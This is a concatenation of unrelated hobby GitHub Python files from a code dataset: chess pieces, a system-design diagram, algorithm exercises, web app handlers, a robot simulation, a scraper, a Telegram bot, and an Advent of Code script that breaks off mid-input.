pairs = [[-2, -1], [-2, 1], [-1, -2], [1, -2], [-1, 2], [1, 2], [2, -1], [2, 1]]\n base_val = 30\n\n\nclass Bishop(LongRangePiece):\n def __init__(self, game, data):\n super().__init__(game, data)\n\n directions = [[1,-1], [1, 1], [-1, -1], [-1, 1]]\n base_val = 30\n\n\nclass Queen(LongRangePiece):\n def __init__(self, game, data):\n super().__init__(game, data)\n\n directions = [[-1, 0], [1, 0], [0, -1], [0, 1], [1,-1], [1, 1], [-1, -1], [-1, 1]]\n base_val = 90\n\n\nclass King(ShortRangePiece):\n def __init__(self, game, data):\n super().__init__(game, data)\n\n self.castle_move = data['castle_move']\n # if self.color == 'white':\n # self.game.white_king = self\n # else:\n # self.game.black_king = self\n pairs = [[1,-1], [1, 1], [-1, -1], [-1, 1], [-1, 0], [1, 0], [0, -1], [0, 1]]\n base_val = 900\n\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'color': self.color,\n 'curr_coords': self.curr_coords,\n 'times_moved': self.times_moved,\n 'valid_moves': self.valid_moves,\n 'castle_move': self.castle_move\n }\n\n def move(self, new_coordinates, piece=None):\n [curr_row, curr_col] = self.curr_coords\n [new_row, new_col] = new_coordinates\n old_piece = self.game.board[new_row][new_col]\n coords_str = ','.join([str(num) for num in new_coordinates])\n if self.castle_move.get(coords_str):\n rookStr = self.castle_move[coords_str]['piece']\n rook = self.game.pieces[rookStr[:5]][rookStr]\n [rook_row, rook_col] = self.castle_move[coords_str]['spot']\n [old_rook_row, old_rook_col] = rook.curr_coords\n\n self.game.board[old_rook_row][old_rook_col] = None\n self.game.board[rook_row][rook_col] = rookStr\n rook.curr_coords = [rook_row, rook_col]\n rook.times_moved += 
1\n\n\n if old_piece:\n del self.game.pieces[old_piece[:5]][old_piece]\n\n\n\n self.game.board[curr_row][curr_col] = None\n self.game.board[new_row][new_col] = self.id\n self.curr_coords = new_coordinates\n self.times_moved += 1\n\n return False\n\n\n def get_valid_moves(self):\n self.castle_move = {}\n res = []\n visible_squares = self.get_line_of_sight()\n\n friendly_pieces = self.game.pieces[self.color]\n\n for square in visible_squares:\n [row, col] = square\n if not (self.game.board[row][col]) or (self.game.board[row][col][:5] != self.color):\n res.append(square)\n\n res = [square for square in res if not (square in self.game.opponent_line_of_sight)]\n\n if self.times_moved == 0 and not self.game.checks:\n leftRight = [-1, 1]\n\n for direction in leftRight:\n [row, col] = self.curr_coords\n castle_move = [row, (direction * 2) + col]\n castle_move_str = f'{row},{(direction * 2) + col}'\n dependantMove = [row,direction + col]\n foundPiece = None\n\n while col+direction in range(8) and not foundPiece:\n col += direction\n\n if self.game.board[row][col]:\n pieceStr = self.game.board[row][col]\n foundPiece = friendly_pieces.get(pieceStr)\n\n\n if foundPiece and foundPiece.id[6:10] == 'rook' and foundPiece.times_moved == 0:\n if dependantMove in res and not (castle_move in self.game.opponent_line_of_sight):\n self.castle_move[castle_move_str] = {'piece': pieceStr, 'spot': dependantMove}\n res.append(castle_move)\n\n\n self.valid_moves = res\n if res:\n self.game.valid_moves[self.curr_coords_str] = res\n return res\n\n\n def check_for_pins(self):\n pairs = [[['bish', 'quee'], [[1,-1], [1, 1], [-1, -1], [-1, 1]]], [['rook', 'quee'], [[-1, 0], [1, 0], [0, -1], [0, 1]]]]\n res = {}\n\n for pair in pairs:\n [threats, directions] = pair\n for direction in directions:\n [rowDir, colDir] = direction\n [row, col] = self.curr_coords\n pinnedMoves = []\n pieces = []\n\n\n while row+rowDir in range(8) and col+colDir in range(8) and len(pieces) < 2:\n row += rowDir\n col += colDir\n\n pinnedMoves.append([row, col])\n\n if self.game.board[row][col]:\n pieces.append(self.game.board[row][col])\n\n\n if (len(pieces) == 2) and (pieces[0][:5] == self.color) and (pieces[1][:5] != self.color) and (pieces[1][6:10] in threats):\n res[self.game.pieces[self.color][pieces[0]].curr_coords_str] = pinnedMoves\n\n return res\n\npieces_obj = {\n 'pawn': Pawn,\n 'rook': Rook,\n 'knig': Knight,\n 'bish': Bishop,\n 'quee': Queen,\n 'king': King\n}\n","repo_name":"peter-monahan/Just-Chess","sub_path":"app/py_chess/Pieces.py","file_name":"Pieces.py","file_ext":"py","file_size_in_byte":12056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22521385598","text":"\"\"\"Airbnb System Design.\"\"\"\nimport sys\nfrom hornet.digraph import Digraph, SubGraph, Cluster\nfrom systems.nodes import (\n Kafka,\n Elasticsearch,\n Cassandra,\n Internet,\n NextJs,\n Redis,\n HAProxy,\n Spring,\n Python,\n PostgreSQL,\n)\n\n\nif __name__ == \"__main__\":\n \"\"\"Draw an Airbnb system architecture.\"\"\"\n with Digraph(\n sys.argv[1],\n {\n \"dpi\": \"350\",\n \"splines\": \"true\",\n \"newrank\": \"true\",\n \"fontname\": \"Times New Roman\",\n },\n cleanup=False,\n ):\n internet = Internet(\"Internet\")\n with Cluster():\n with SubGraph({\"rank\": \"same\"}):\n frontend = NextJs(\"Frontend\")\n api_gateway = Spring(\"API Gateway\")\n frontend >> api_gateway\n\n load_balancer = HAProxy(\"Load Balancer\")\n load_balancer >> frontend\n api_gateway >> Spring(\"User\") >> 
PostgreSQL(\"DB\")\n internet >> [load_balancer, api_gateway]\n hotel = Spring(\"Hotel\")\n api_gateway >> hotel >> PostgreSQL(\"DB\")\n booking = Spring(\"Booking\")\n api_gateway >> booking\n (\n api_gateway\n >> Spring(\"Hotel\")\n >> [\n PostgreSQL(\"DB\"),\n Redis(\"Cache\"),\n Elasticsearch(\"Search\"),\n ]\n )\n\n booking >> [PostgreSQL(\"DB\")]\n\n messages = Kafka(\"User activities\")\n analysis = Python(\"Analysis\")\n\n (\n [hotel, booking]\n >> messages\n << analysis\n >> Cassandra(\"User activities\")\n )\n","repo_name":"nryotaro/sd","sub_path":"systems/systems/airbnb/leetcode.py","file_name":"leetcode.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22526232977","text":"'''\nMin Rewards\n\nGiven list of unique scores, give list of reward points according to two rules:\n1. all students must receive at least one reward\n2. any given student must receive more rewards than an adjacent student \nwith a lower score and must receive strictly fewer rewards than an adjacent \nstudent with a higher score. \n\nSample input: [8, 4, 2, 1, 3, 6, 7, 9, 5]\nSample output: 25 ([4, 3, 2, 1, 2, 3, 4, 5, 1])\n'''\nimport time\n\nclass Prob:\n @staticmethod\n def minRewards(scores):\n rewards = [1] * len(scores)\n \n i = 1\n decn = 0\n while i < len(scores):\n print(\"i===\", i)\n \n if scores [i-1] < scores[i]:\n # for increase\n if decn > 0:\n print(\" decn is currently: \", decn)\n for j in range(i-2, i-decn-2, -1):\n if rewards[j] < rewards[j+1]+1:\n rewards[j] = rewards[j+1]+1\n \n print(\" rewards[j={}]= {}\".format(j,rewards[j]))\n decn = 0\n \n rewards[i] += rewards[i-1]\n \n else:\n # for decrease\n # count number of decreasing values\n decn += 1\n print(\"decn: \", decn)\n \n i+=1\n \n if decn > 0 and rewards[-1]==1 and rewards[-2]==1:\n print(\"B i=\", i)\n for j in range(i-2, i-decn-2, -1):\n print(\"B j=\", j)\n rewards[j] = rewards[j+1] + 1\n print(\"final rewards:\", rewards) \n return sum(rewards)\n \n @staticmethod\n def test1():\n #scores = [8, 4, 2, 1, 3, 6, 7, 9, 5] #25\n #scores = [8, 4, 2, 1, 3, 6, 7, 9, 10] #30\n #scores = [1]\n #scores = [5,10]\n #scores = [10,5]\n #scores = [10,9,8,7]\n #scores = [5,10,11]\n #scores = [5,10,9]\n #scores = [5,10,15,20,17,18,19]\n #scores = [0, 4, 2, 1, 3] # 9\n scores = [800, 400, 20, 10, 30, 61, 70, 90, 17, 21]\n #scores = [800, 400, 20, 10, 30, 61, 70, 90, 17, 21, 22, 13, 12, 11, 8, 4, 2, 1, 3, 6, 7, 9, 0, 68, 55, 67, 57, 60, 51, 661, 50, 65, 53] #93\n #scores = [i for i in range(10,-1,-1)]\n rewardSum = Prob.minRewards(scores)\n print(\"test1: rewardSum: \", rewardSum)\n \n @staticmethod\n def minRewards2(scores):\n rewards = [1] * len(scores)\n for i in range(1, len(scores)):\n if scores[i-1] < scores[i]:\n rewards[i] += rewards[i-1]\n print(\"rewards A: \", rewards)\n for i in range(len(scores)-2, -1, -1):\n if scores[i] > scores[i+1] and rewards[i+1]+1 > rewards[i]:\n rewards[i] = rewards[i+1]+1\n print(\"rewards B: \", rewards)\n rewardSum = sum(rewards)\n print(\"rewardSum: \", rewardSum)\n return rewardSum\n \n @staticmethod\n def test2():\n scores = [8, 4, 2, 1, 3, 6, 7, 9, 5] #25\n #scores = [8, 4, 2, 1, 3, 6, 7, 9, 10] #30\n #scores = [1]\n #scores = [5,10]\n #scores = [10,5]\n #scores = [10,9,8,7]\n #scores = [5,10,11]\n #scores = [5,10,9]\n #scores = [5,10,15,20,17,18,19]\n #scores = [0, 4, 2, 1, 3] # 9\n #scores = [800, 400, 20, 10, 30, 61, 70, 90, 17, 21]\n #scores = [800, 400, 20, 10, 30, 61, 70, 90, 17, 21, 22, 13, 
12, 11, 8, 4, 2, 1, 3, 6, 7, 9, 0, 68, 55, 67, 57, 60, 51, 661, 50, 65, 53] #93\n        #scores = [i for i in range(10,-1,-1)]\n        Prob.minRewards2(scores)\n    \n#Prob.test1()\nProb.test2()\n","repo_name":"mcxu/code-sandbox","sub_path":"PythonSandbox/src/misc/min_rewards.py","file_name":"min_rewards.py","file_ext":"py","file_size_in_byte":3651,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
+{"seq_id":"74182409386","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\nimport webapp2\n\nimport os\nfrom google.appengine.ext.webapp import template\n\nfrom google.appengine.ext.webapp.util import login_required\nfrom google.appengine.api import users\n\nimport common\n\nimport datetime # date module\n\nfrom MstUser import * # user master\nfrom DatSoudan import * # consultation records\n\nclass MainHandler(webapp2.RequestHandler):\n\n    @login_required\n\n    def get(self):\n\n        user = users.get_current_user() # confirm logon\n        if MstUser().ChkUser(user.email()) == False:\n            self.redirect(users.create_logout_url(self.request.uri))\n            return\n        if self.request.get('Hizuke') == \"\": # no parameter?\n            Hizuke = self.request.cookies.get('Hizuke', '') # from cookie\n        else:\n            Hizuke = self.request.get('Hizuke') # get parameter\n            cookieStr = 'Hizuke=' + self.request.get('Hizuke') + ';' # save cookie\n            self.response.headers.add_header('Set-Cookie', cookieStr.encode('shift-jis'))\n\n        LblMsg = \"Select a record, or press New to create one\"\n\n        template_values = {\n            'Hizuke':Hizuke,\n            'Recs' :DatSoudan().GetAll(),\n            'LblMsg': LblMsg\n        }\n        path = os.path.join(os.path.dirname(__file__), 'Ninchi010.html')\n        self.response.out.write(template.render(path, template_values))\n\n    def post(self):\n\n        LblMsg = \" \"\n\n        for param in self.request.arguments(): \n            if \"BtnSelect\" in param: # update button?\n                Parm = \"?Key=\" + param.replace(\"BtnSelect\",\"\") # from cookie\n                self.redirect(\"/Ninchi020/\" + Parm) #\n            if \"BtnDel\" in param: # delete button?\n                DatSoudan().DelRec(param.replace(\"BtnDel\",\"\"))\n\n        if self.request.get('BtnAdd') != '':\n            Parm = \"?Hizuke=\" + self.request.cookies.get('Hizuke', '') # from cookie\n            self.redirect(\"/Ninchi020/\" + Parm) # \n            return\n\n        Hizuke = self.request.cookies.get('Hizuke', '') # from cookie\n\n        template_values = {\n            'Hizuke':Hizuke,\n            'Recs' :DatSoudan().GetAll(),\n            'LblMsg': LblMsg\n        }\n        path = os.path.join(os.path.dirname(__file__), 'Ninchi010.html')\n        self.response.out.write(template.render(path, template_values))\n\n####################################################################################################\n\n\napp = webapp2.WSGIApplication([\n    ('/Ninchi010/', MainHandler)\n], debug=True)\n","repo_name":"YuziSumoto/Ninchi","sub_path":"Ninchi010.py","file_name":"Ninchi010.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"34356535623","text":"'''\r\nCreated on 06/03/2012\r\n\r\n@author: Evandro\r\n'''\r\n\r\nclass Poker(object):\r\n    '''\r\n    classdocs\r\n    '''\r\n\r\n\r\n    def __init__(self):\r\n        '''\r\n        Constructor\r\n        '''\r\n    def _converte_para_numero(self, carta):\r\n        if carta == 'J':\r\n            return 11\r\n        elif carta == 'Q':\r\n            return 12\r\n        elif carta == 'K':\r\n            return 13\r\n        elif carta == 'A':\r\n            return 14\r\n        else:\r\n            return carta\r\n    \r\n    \r\n    \r\n    def ValidaJogada(self, jogador_1_numero, jogador_2_numero):\r\n        \r\n        for valor in ['14', '13', '12', '11', '10', '9', '8', '7', '6', '5', '4', '3', '2']:\r\n            count_jogador_1 = jogador_1_numero.count(str(valor))\r\n            count_jogador_2 = 
jogador_2_numero.count(str(valor))\r\n if count_jogador_1 > count_jogador_2 and count_jogador_1 > 1:\r\n return 1\r\n elif count_jogador_2 > count_jogador_1 and count_jogador_2 > 1:\r\n return 2\r\n\r\n \r\n ultimaCartaJogador1 = self._converte_para_numero(jogador_1_numero[4])\r\n ultimaCartaJogador2 = self._converte_para_numero(jogador_2_numero[4])\r\n \r\n if (int(ultimaCartaJogador1) > int(ultimaCartaJogador2)):\r\n return 1\r\n elif (int(ultimaCartaJogador2) > int(ultimaCartaJogador1)):\r\n return 2\r\n else:\r\n return 0 \r\n \r\n","repo_name":"evandroamparo/dojo-tecsystem","sub_path":"poker/src/main/Poker.py","file_name":"Poker.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2754800391","text":"from flask import Blueprint, request\nfrom ..DBConnect import setup, insert, select, delete\n\nbp = Blueprint('main', __name__, url_prefix='/')\n\n# http://localhost:5000/\n@bp.route('/')\ndef query():\n setup()\n\n if request.method == 'GET':\n type = request.args.get('queryType')\n tableName = request.args.get('tableName')\n datas = 'null'\n\n if type == 'insert':\n datas = request.args.get('datas')\n insert(tableName=tableName, datas=datas)\n elif type == 'select':\n params = request.args.get('params')\n data = request.args.get('data')\n datas = select(tableName=tableName, params=params, data=data)\n\n if len(datas) == 0:\n return [{'what': f'{tableName} is null'}]\n\n return datas\n elif type == 'delete':\n data = request.args.get('data')\n delete(tableName=tableName, data=data)\n\n return [{'what': f'execute insert or delete'}]\n","repo_name":"BosungJu/py_kiosk_server","sub_path":"kioskServer/views/main_views.py","file_name":"main_views.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71079214508","text":"from tornado.queues import Queue\nfrom tornado import gen\nfrom tornado.ioloop import IOLoop\nfrom preview.previewer import Previewer\n\n\nclass PreviewConsumer:\n id = 0\n\n def __init__(self, queue):\n PreviewConsumer.id += 1\n self.id = PreviewConsumer.id\n self.queue = queue\n\n @gen.coroutine\n def process(self):\n while True:\n task = yield self.queue.get()\n image, imageId, bucket, logger = task\n previewer = Previewer(image, imageId, bucket, logger)\n try:\n yield previewer.makeThumbnails()\n except Exception:\n try:\n logger.exception()\n except Exception:\n logger.error(\"failed logged exception\")\n finally:\n self.queue.task_done()\n\n\n\nclass BaseQueue:\n def __init__(self, consumerCls, countConsumer):\n self.queue = Queue()\n self.consumers = []\n self.start = False\n self.countConsumer = countConsumer\n self.consumerCls = consumerCls\n\n @gen.coroutine\n def putTask(self, task):\n\n if not self.start:\n for i in range(self.countConsumer):\n consumer = self.consumerCls(self.queue)\n self.consumers.append(consumer)\n IOLoop.current().spawn_callback(consumer.process)\n self.start = True\n\n yield self.queue.put(task)\n\n\nTHUMBNAIL_QUEUE = BaseQueue(PreviewConsumer, 5)","repo_name":"qonteo/luna","sub_path":"luna_v.3.3.3/luna-image-store/luna_image_store/preview/preview_queue.py","file_name":"preview_queue.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12753274749","text":"__author__ = 'HaoBin'\n\nfrom Week5.Q6 import *\n\ndef Hirschberg(p, q, p1, p2, q1, 
q2):\n    print(\">>>\",p[p1:p2],p1,p2)\n    print(\">>>\",q[q1:q2],q1,q2)\n    z = \"\"\n    w = \"\"\n    if p2 <= p1:\n        # BASE CASE: P empty\n        for i in range(q1, q2):\n            z += \"-\"\n            w += q[i]\n        print(\"c1\",z,w)\n\n    elif q2 <= q1:\n        # BASE CASE: Q empty\n        for i in range(p1, p2):\n            z += p[i]\n            w += \"-\"\n        print(\"c2\",z,w)\n\n    elif p2 - 1 == p1 or q2-1 == q1:\n        # BASE CASE: LEN(P)=1 and LEN(Q)>=1\n        z,w = NeedlemanWunsch(p[p1:p2],q[q1:q2])\n        print(\"c3\",z,w)\n\n\n    else:\n        print(\"l1\")\n        mid = (p1 + p2) // 2\n        fwd = DPA(p1, mid, q1, q2, p, q)\n        rev = DPA(p2, mid, q1, q2, p, q)\n\n        s2mid = q1\n        best = len(p) + len(q)\n        for i in range(1,q2 - q1):\n            sum = fwd[i] + rev[i]\n            if sum <= best:\n                best = sum\n                s2mid = i\n        print(\"r1\")\n        z1, w1 = Hirschberg(p, q, p1, mid, q1, s2mid)\n        print(\"r2\")\n        z2, w2 = Hirschberg(p, q, mid, p2, s2mid, q2)\n        z = z + z1 + z2\n        w = w + w1 + w2\n    print(\"x\",z,w)\n    return z, w\n\n\ndef DPA(p1, p2, q1, q2, p, q):\n    m = [[None for i in range(len(q) + 1)] for j in range(2)]\n    flag = False\n    # print(p1,p2)\n    if p2 < p1:\n        q = q[::-1]\n        p = p[::-1]\n        p1, p2 = 0, p1 - p2\n        flag = True\n    c = p1 % 2\n    m[c][q1] = 0\n    for j in range(q1 + 1, q2 + 1):\n        m[c][j] = m[c][j - 1] + 1\n    for i in range(p1 + 1, p2 + 1):\n        m[i % 2][q1] = m[(i - 1) % 2][q1] + 1\n        for j in range(q1 + 1, q2 + 1):\n            diag = m[(i - 1) % 2][j - 1]\n            if p[i - 1] != q[j - 1]:\n                diag += 2\n            m[i % 2][j] = min(diag, m[(i - 1) % 2][j] + 1, m[i % 2][j - 1] + 1)\n    #print(\">\",m)\n    if flag is True:\n        return m[(p2 - p1) % 2][q2 + 1:q1:-1][::-1]\n    else:\n        return m[(p2 - p1) % 2][q1 + 1:q2 + 1]\n","repo_name":"hbinl/hbinl-scripts","sub_path":"Python/P5 - Sorting and Edit Distance/Hirschberg-Old.py","file_name":"Hirschberg-Old.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"3564549413","text":"from startup import *\nfrom robot_controle import *\nfrom driving_calc import *\nfrom slam import Slam\nimport numpy as np\nimport sys\nfrom matplotlib import pyplot as plt\n\nclass Robot:\n\tdef __init__(self):\n\t\t#robot parameters\n\t\tself.omtrek_wiel = 0.08 * np.pi\n\t\tself.afstand_wielen = 0.26\n\t\tself.correctiefactor = 0.95\n\t\tself.scan_hoek = 365/4/60\n\t\tself.Robot_parts = ['linkermotor','rechtermotor','Laser_Sensor','Laser_Sensor0','Laser_Sensor1','Laser_Sensor2','Lidar_Motor','Dummy']\n\t\tself.motors = ['linkermotor','rechtermotor']\n\t\tself.sensors = ['Laser_Sensor','Laser_Sensor0','Laser_Sensor1','Laser_Sensor2']\n\t\tself.rejection_distance = 0.2\n\t\t\n\t\t#initialize slam\n\t\tself.ObjSlam = Slam()\n\t\t\n\t\t#startup parameters\n\t\tself.modus = 0 \t#0 is scan a full round\n\t\t\t\t\t\t#1 is drive a short stretch\n\t\tself.ticks = 0\n\t\tself.locatie = [0,0,0]\n\t\tself.distance = {'Laser_Sensor':[],'Laser_Sensor0':[],'Laser_Sensor1':[],'Laser_Sensor2':[]}\n\t\tself.map_landmark = []\n\t\tself.geschiedenis_locatie_x = []\n\t\tself.geschiedenis_locatie_y = []\n\t\tself.slam_position = [0,0,0]\n\t\tself.real_position = [0,0]\n\t\t\n\t\tself.clientID = make_connection()\n\t\tself.handle = get_handle(self.clientID,self.Robot_parts)\n\t\tself.old_motor_position = position_motor(self.handle,self.motors,self.clientID)\n\t\tvrep.simxSynchronousTrigger(self.clientID)\n\t\tplt.ion()\n\t\tplt.show()\n\n\tdef pos_calculate(self):\n\t\tself.motor_position = 
position_motor(self.handle,self.motors,self.clientID)\n\t\tself.locatie,self.old_motor_position=drive_calc(self.motor_position,self.old_motor_position,self.motors,self.omtrek_wiel,self.afstand_wielen,self.locatie,self.correctiefactor)\n\t\tself.geschiedenis_locatie_x.append(self.locatie[0])\n\t\tself.geschiedenis_locatie_y.append(self.locatie[1])\n\t\t\n\t\t#fetch the real position from vrep, first rotation then position\n\t\torrientatie = get_orrientation(self.handle,self.clientID,'Dummy')\n\t\tself.real_position = get_position(self.handle,self.clientID,'Dummy')\n\t\t\n\t\t\n\tdef drive(self):\n\t\tself.driving(3,6)\n\t\tself.ticks += 1\n\t\tself.pos_calculate()\n\t\tObjRobot.plotting()\n\t\tif self.ticks > 20:\n\t\t\tself.modus = 0\n\t\t\tself.ticks = 1\n\t\t\n\tdef driving(self,left_motor,right_motor):\n\t\tmove_motor(self.handle,'linkermotor',left_motor,self.clientID)\n\t\tmove_motor(self.handle,'rechtermotor',right_motor,self.clientID)\n\t\n\tdef scanning(self):\n\t\tself.driving(0,0)\n\t\tlidar_positie = position_lidar_motor(self.handle,'Lidar_Motor',self.clientID)\n\t\tlidar_positie += (self.scan_hoek/365)*2*np.pi\n\t\tself.distance = distance_sensor(self.handle,self.sensors,self.clientID,self.distance)\n\t\tif lidar_positie > np.pi/2:\n\t\t\tlidar_positie = 0\n\t\t\tself.measured_points_x,self.measured_points_y,self.map_x,self.map_y,self.robot_map_x,self.robot_map_y,self.new_location = self.ObjSlam.calculations(self.distance,self.locatie)\n\t\t\treal_locatie = get_position(self.handle,self.clientID,'Dummy')\n\t\t\tObjRobot.plotting()\n\t\t\tself.distance = {'Laser_Sensor':[],'Laser_Sensor0':[],'Laser_Sensor1':[],'Laser_Sensor2':[]}\n\t\t\tself.modus = 1\n\t\tmove_lidar_motor(self.handle,'Lidar_Motor',lidar_positie,self.clientID)\n\t\t\n\tdef plotting(self):\n\t\t#red is the computed location\n\t\t#green is the actual location\n\t\tplt.gcf().clear()\n\t\tplt.scatter(self.locatie[0],self.locatie[1],color='red')\n\t\tif self.ticks > 0:\n\t\t\tplt.scatter(self.real_position[1][1],-self.real_position[1][0],color='green')\n\t\tif self.new_location is not False:\n\t\t\tplt.scatter(self.new_location[0],self.new_location[1],color='orange')\t\t\n\t\tplt.scatter(self.measured_points_x,self.measured_points_y,color='purple')\n\t\tplt.scatter(self.robot_map_x,self.robot_map_y,color='blue')\n\t\tplt.scatter(self.map_x,self.map_y,color='yellow')\n\t\tplt.axis('equal')\n\t\tplt.draw()\n\t\tplt.pause(0.001)\n\t\t\n\t\t\nObjRobot = Robot()\n\n\ntry:\n\twhile True:\n\t\tif ObjRobot.modus == 0:\n\t\t\tObjRobot.scanning()\n\t\tif ObjRobot.modus == 1:\n\t\t\tObjRobot.drive()\n\t\tvrep.simxSynchronousTrigger(ObjRobot.clientID)\n\t\t\nexcept KeyboardInterrupt:\n\tvrep.simxStopSimulation(ObjRobot.clientID,vrep.simx_opmode_oneshot)\n\tprint('Simulation stopped')\n\tsys.exit()","repo_name":"remblim/V-rep-stofzuiger","sub_path":"stofzuiger3.py","file_name":"stofzuiger3.py","file_ext":"py","file_size_in_byte":3965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"12395386384","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom AIOAS.utils import Utils\nimport re\n\n\nclass FourAnime:\n    util = Utils()\n\n    def get_anime(self, url):\n        result = []\n        try:\n            with requests.get(url) as r:\n                soup = BeautifulSoup(r.text, \"html.parser\")\n                animes = soup.find_all(id=\"headerDIV_3\")\n                for anime in animes:\n                    aninfo = anime.find(id=\"headerA_5\")\n                    result.append(\n                        {\n                            aninfo.find(id=\"headerIMG_6\").attrs[\"alt\"]: aninfo.attrs[\n                                \"href\"\n                            ]\n                        }\n                    )\n        except:\n            
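# Any scraping error triggers a recursive retry of the same URL\n            # (no backoff, so a persistently failing page can recurse deeply).\n            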
result = self.get_anime(url)\n        return result\n\n    def get_all_anime(self):\n        result = []\n        page_num = 1\n        page = None\n        # walk successive listing pages until an empty page comes back\n        while page is None or len(page) > 0:\n            page = self.get_anime(\n                f\"https://4anime.to/browse?sort_order=title+asc&sf_paged={page_num}\"\n            )\n            result += page\n            page_num += 1\n        return result\n\n    def get_episodes_from_slug(self, slug):\n        result = {\"episodes\": [], \"amount\": 0}\n        with requests.get(f\"https://4anime.to/anime/{slug}\") as r:\n            soup = BeautifulSoup(r.text, \"html.parser\")\n            episodes = soup.find(\"ul\", {\"class\": \"episodes range active\"}).find_all(\n                \"li\"\n            )\n            result[\"amount\"] = len(episodes)\n            for x in episodes:\n                result[\"episodes\"].append(str(x.find(\"a\").attrs[\"href\"]))\n        return result\n\n    def get_source_from_ep_url(self, url):\n        with requests.get(url) as r:\n            soup = BeautifulSoup(r.text, \"html.parser\")\n            script = soup.find(\"div\", {\"class\": \"mirror-footer cl\"}).find(\"script\")\n            try:\n                unpacked = self.util.better_unpack(str(script)).replace(\"\\\\\\\\\", \"\")\n            except AttributeError:\n                unpacked = str(script).replace(\"\\\\\", \"\")\n            result = re.search(\n                ' 4096:\n        for x in range(0, len(response), 4096):\n            bot.send_message(chat_id=chat_id, text=response[x:x+4096])\n    else:\n        bot.send_message(chat_id=chat_id, text=response)\n\n    if \"btns\" in bundle.keys():\n        btns = bundle[\"btns\"]\n        bot.sendMessage(chat_id=chat_id, text=str(\"------------------\"), reply_markup=btns)\n    \n    return 'ok'\n\n\ndef button(update: telegram.Update, context: CallbackContext) -> None:\n    \"\"\"Parses the CallbackQuery and updates the message text.\"\"\"\n    query = update.callback_query\n\n    # CallbackQueries need to be answered, even if no notification to the user is needed\n    # Some clients may have trouble otherwise. See https://core.telegram.org/bots/api#callbackquery\n    query.answer()\n\n    query.edit_message_text(text=f\"Selected option: {query.data}\")\n\n#This latest example does not include this function; instead it calls setwebhook\n#in the main block. We leave it here since it should not cause a conflict\n@app.route('/setwebhook', methods=['GET', 'POST'])\ndef set_webhook():\n    # we use the bot object to link the bot to our app which live\n    # in the link provided by URL\n    s = bot.setWebhook('{URL}{HOOK}'.format(URL=URL, HOOK=TOKEN))\n    # something to let us know things work\n    if s:\n        return \"webhook setup ok\"\n    else:\n        return \"webhook setup failed\"\n\n\n\n@app.route('/')\ndef index():\n    return '.'\n\n\nif __name__ == '__main__':\n    dispatcher.add_handler(CommandHandler(\"start\", start))\n    updater._init_thread(dispatcher.start, \"dispatcher\")\n    \n    #we had bot.setWebhook but changed to set_webhook because the bots are\n    #declared differently in this example: here it comes from the updater, in the other one from telegram\n    bot.setWebhook('{URL}{HOOK}'.format(URL=URL, HOOK=TOKEN))\n    #bot.set_webhook(f\"https://{herokuname}.herokuapp.com/{TOKEN}\")\n\n    time.sleep(5)\n    # note the threaded arg which allow\n    # your app to have more than one thread\n    app.run(threaded=True)\n    \n","repo_name":"cjpm1983/telebot1","sub_path":"flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":4487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"41411402191","text":"side_by_players = {}\nplayers_by_side = {}\n\nwhile True:\n    command = input()\n    if command == \"Lumpawaroo\":\n        break\n    else:\n        if \"|\" in command:\n            command = command.split(\" | \")\n            force_side = command[0]\n            force_user = command[1]\n            if force_side not in players_by_side:\n                players_by_side[force_side] = []\n            if 
force_user not in side_by_players:\n side_by_players[force_user] = force_side\n players_by_side[force_side].append(force_user)\n if \" -> \" in command:\n command = command.split(\" -> \")\n force_user = command[0]\n force_side = command[1]\n\n if force_side not in players_by_side:\n players_by_side[force_side] = []\n players_by_side[force_side].append(force_user)\n if force_user in side_by_players:\n other_side = side_by_players[force_user]\n players_by_side[other_side].remove(force_user)\n side_by_players[force_user] = force_side\n else:\n side_by_players[force_user] = force_side\n print(f\"{force_user} joins the {force_side} side!\")\n\nfor side, members in players_by_side.items():\n if len(members) == 0:\n continue\n print(f\"Side: {side}, Members: {len(members)}\")\n for member in members:\n print(f\"! {member}\")\n\n\n\n","repo_name":"GloriyaSG/PythonFundamentalsProjects","sub_path":"dictionaries_exercise/force_book.py","file_name":"force_book.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39690434334","text":"from aocd import get_data, submit\nfrom typing import Any\nfrom pprint import PrettyPrinter\n\ntest_input=\"\"\"addx 15\naddx -11\naddx 6\naddx -3\naddx 5\naddx -1\naddx -8\naddx 13\naddx 4\nnoop\naddx -1\naddx 5\naddx -1\naddx 5\naddx -1\naddx 5\naddx -1\naddx 5\naddx -1\naddx -35\naddx 1\naddx 24\naddx -19\naddx 1\naddx 16\naddx -11\nnoop\nnoop\naddx 21\naddx -15\nnoop\nnoop\naddx -3\naddx 9\naddx 1\naddx -3\naddx 8\naddx 1\naddx 5\nnoop\nnoop\nnoop\nnoop\nnoop\naddx -36\nnoop\naddx 1\naddx 7\nnoop\nnoop\nnoop\naddx 2\naddx 6\nnoop\nnoop\nnoop\nnoop\nnoop\naddx 1\nnoop\nnoop\naddx 7\naddx 1\nnoop\naddx -13\naddx 13\naddx 7\nnoop\naddx 1\naddx -33\nnoop\nnoop\nnoop\naddx 